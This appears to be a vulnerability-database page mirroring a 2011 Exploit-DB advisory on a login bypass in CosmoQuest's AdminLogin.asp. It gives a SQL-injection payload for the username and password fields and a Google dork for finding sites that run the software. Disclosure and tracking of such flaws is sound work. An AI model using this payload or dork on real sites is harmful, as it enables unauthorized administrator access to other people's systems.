CosmoQuest bypass login page Vulnerability

vendor:

CosmoQuest

by:

Net.Edit0r

7.5

CVSS

HIGH

Bypass Login Page

287

CWE

Product Name: CosmoQuest

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux/php

2011

CosmoQuest bypass login page Vulnerability

A vulnerability exists in the AdminLogin.asp page of CosmoQuest, which allows an attacker to bypass the login page by using the username 'or''=' and the password 'or''='.

Mitigation:

Ensure that authentication is properly implemented and enforced.

Source

Exploit-DB raw data:

==========================================
CosmoQuest bypass login page Vulnerability
==========================================

[~]######################################### InformatioN

[~] Title     : CosmoQuest bypass login page Vulnerability
[~] Author    : Net.Edit0r
[~] Vendor or Software Link  : http://www.cosmoquest.info/
[~] Email     : Black.hat.tm@gmail.com
[~] Data  : 2011-03-29
[~] Google dork: "Powered by CosmoQuest"
[~] Category:  [Webapps]
[~] Tested on: [Linux /php]

[~]#########################################   ExploiT

[~] Vulnerable File :

AdminLogin.asp

[~] ExploiT         :

http://127.0.0.1/AdminLogin.asp

user: 'or''='

pass: 'or''='


[~] ######################################### ThankS To ...

[~] Black Hat Group Member  :

Net.Edit0r & DarkCoder & fronk & Amir-MaGic & H3x & Milad.C0nn3ct0r #BHG

[~] IRANIAN Young HackerZ # Persian Gulf

[~]#########################################   FinisH :D